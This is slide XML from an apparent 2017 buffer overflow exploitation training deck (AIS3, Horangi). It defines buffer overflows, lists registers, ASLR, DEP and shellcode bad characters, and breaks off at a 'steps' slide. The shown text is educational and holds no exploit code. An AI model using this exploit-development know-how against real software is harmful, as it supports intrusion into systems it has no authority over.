              <a:t>Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In computer security and programming, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buffer overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> overrun, is an anomaly where a program, while writing data to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, overruns the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buffer's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> boundary and overwrites adjacent memory locations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Buffer overflows can often be triggered by malformed inputs; if one assumes all inputs will be smaller than a certain size and the buffer is created to be that size, if an anomalous transaction produces more data it could cause it to write past the end of the buffer. If this overwrites adjacent data or executable code, this may result in erratic program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, including memory access errors, incorrect results, and crashes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>-Wikipedia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31930028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1" name="Shape 631"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7724117" y="4592496"/>
            <a:ext cx="829082" cy="316050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA196286-0D90-4E96-B1A7-F705FD510235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805700" y="1466754"/>
            <a:ext cx="5532599" cy="2209992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2402606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1" name="Shape 631"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7724117" y="4592496"/>
            <a:ext cx="829082" cy="316050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E9D683C-5F4B-482C-BD8A-B864EB6EC0C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793102" y="1035698"/>
            <a:ext cx="7760097" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will not be covering:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fuzzing (using SPIKE), tutorials can be found easily online</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Egghunting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>“Staged shellcode”, using a small amount of custom shellcode to find your actual (bigger) shellcode (the “egg”) by searching for the final shellcode in memory. This is can be grasped easily after today’s walkthrough</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1873405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3" name="Shape 643"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="457200"/>
            <a:ext cx="1416049" cy="538981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="Shape 644"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450437" y="1882081"/>
            <a:ext cx="8229600" cy="1379400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="9000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Let’s go.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Shape 645"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4291584"/>
            <a:ext cx="8229600" cy="475678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>August/Sept 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>AIS3 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Horangi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Taiwan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Shape 646"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="822960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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>Not for public distribution • Copyright 201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED4D42FF-02B2-414A-ABD2-F70F27268873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809196" y="996181"/>
            <a:ext cx="7877604" cy="5047536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflow Glossary:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>EIP: the Extended Instruction Pointer is the address of the next instruction to be processed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ESP: the Extended Stack Pointer is the top of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>EBP: the Extended Base Pointer is the bottom of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Address Space Layout Randomization (ASLR): ASLR is a technique to randomize the position of the stack, executables, and loaded libraries, making it more difficult for attackers to exploit buffer overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>vulnerabities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fuzzing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Fuzzing or fuzz testing is a technique used to provide invalid or unexpected data to a program execution. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data Execution Prevention (DEP)/Windows, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>grsecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>selinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/ Linux, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mandatory Access Control (MAC)/Mac – Prevents code execution from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>system reserved memory locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bad Characters: Unwanted characters that can break shellcode. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00 Null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0A Line Feed \n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0D Carriage Return \r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FF Form Feed \f</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1717573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3" name="Shape 643"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="457200"/>
            <a:ext cx="1416049" cy="538981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="Shape 644"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450437" y="1882081"/>
            <a:ext cx="8229600" cy="1379400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="9000" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Let’s go.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Shape 645"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4291584"/>
            <a:ext cx="8229600" cy="475678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>August/Sept 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>AIS3 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Horangi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Taiwan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Shape 646"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="822960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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>Not for public distribution • Copyright 201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED4D42FF-02B2-414A-ABD2-F70F27268873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="802432" y="1184981"/>
            <a:ext cx="7573471" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Buffer Overflow Steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
